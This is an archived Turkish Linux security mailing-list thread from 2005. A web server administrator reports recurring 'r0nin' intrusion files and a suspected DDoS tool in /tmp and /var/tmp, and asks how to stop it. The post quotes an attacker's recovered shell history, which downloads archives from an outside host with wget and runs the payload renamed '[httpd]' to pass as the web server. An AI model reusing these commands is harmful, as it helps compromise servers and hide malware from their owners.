[Linux-guvenlik] r0nin

New Message	Reply	About this list	Date view	Thread view	Subject view	Author view	Attachment view

From: The RED (jdred@gmx.net)
Date: Mon 18 Apr 2005 - 13:50:25 EEST

Previous message: Onur Tolga Sehitoglu: "[LKD-duyuru] Seminer: Neden Linux'suz Olmuyor?"
Next in thread: Emre Erim: "Re: [Linux-guvenlik] r0nin"

/var/tmp dizininde .bash_history oluşmuş. Sunucudaki exploit bir shell
hesabı açıyor herhalde ve ev dizinini /var/tmp olarak veriyor. Normalde
hiçbir kullanıcının shell izni yok. (sunucu web sunucu)
/var/tmp/.bash_history dosyasının içeriği:

e
w
/sbin/ifconfig
w
cd /var/tmp/.hu
cd /var/tmp
mkdir .hu
cd .hu
wget powerlock.home.ro/newpas.tgz
wget powerlock.home.ro/newpass.tgz
tar zxvf newpass.tgz
mv newpass [httpd]
export PATH="."
[httpd]

----- Original Message -----
From: "The RED" <jdred@gmx.net>
To: <linux-sunucu@liste.linux.org.tr>
Sent: Monday, April 18, 2005 1:43 PM
Subject: Re: [Linux-sunucu] r0nin

> Birileri sürekli /tmp ve /var/tmp dizinlerine r0nin vs. gibi dosyalar
> yerleştirip çalıştırıyorlar. Az önce de "atac" isimli bri şey yüklenmiş ve
> biraz önce bri atak yapıldı. 200-300 tane çalıştırılmış. ddos atağı
> yapılıyor herhalde sunucu üzerinden. /var/tmp ve /tmp dizinlerindeki
> dosyaların çalıştırılmasını nasıl önleyebilirim bilen yok mu?? Isletim
> sistemi: Fedora core 1, kernel 2.4.22-1.2115.nptl,

>
> ----- Original Message -----
> From: "The RED" <jdred@gmx.net>
> To: <linux-sunucu@liste.linux.org.tr>
> Sent: Monday, April 18, 2005 11:48 AM
> Subject: [Linux-sunucu] r0nin
>
>
>> merhaba. sunucuma bir süredir r0nin dadandi. daha önce temizlemistim
>> yeniden
>> /tmp/ dizini altina girmis. Daha önce de bu dizin altinda r0nin, brk gibi
>> şeyler vardi silmistim ama bugün r0nin tekrar o dizinde.
>> Internetten biraz arastirdim ama yeterli bilgiye rastlayamadim henüz.
>> Nedir bu r0nin tam olarak? Apache ile ilgili bir açiktan bahsediliyor.
>> Nasil
>> bulasiyor? Etkileri (yol açabileceği şeyler) neler ve nasil tam olarak
>> silinebiliyor? Bilen varsa lütfen yardimci olun.
>>
>>
>
>
> --------------------------------------------------------------------------------
>
>
> _______________________________________________
> Linux-sunucu mailing list
> Linux-sunucu@liste.linux.org.tr
> http://liste.linux.org.tr/mailman/listinfo/linux-sunucu
>
>

--------------------------------------------------------------------------------

_______________________________________________
Linux-sunucu mailing list
Linux-sunucu@liste.linux.org.tr
http://liste.linux.org.tr/mailman/listinfo/linux-sunucu

_______________________________________________
Linux-guvenlik mailing list
Linux-guvenlik@liste.linux.org.tr
http://liste.linux.org.tr/mailman/listinfo/linux-guvenlik

Previous message: Onur Tolga Sehitoglu: "[LKD-duyuru] Seminer: Neden Linux'suz Olmuyor?"
Next in thread: Emre Erim: "Re: [Linux-guvenlik] r0nin"

New Message	Reply	About this list	Date view	Thread view	Subject view	Author view	Attachment view

Bu arsiv hypermail 2.1.2 tarafindan uretilmistir.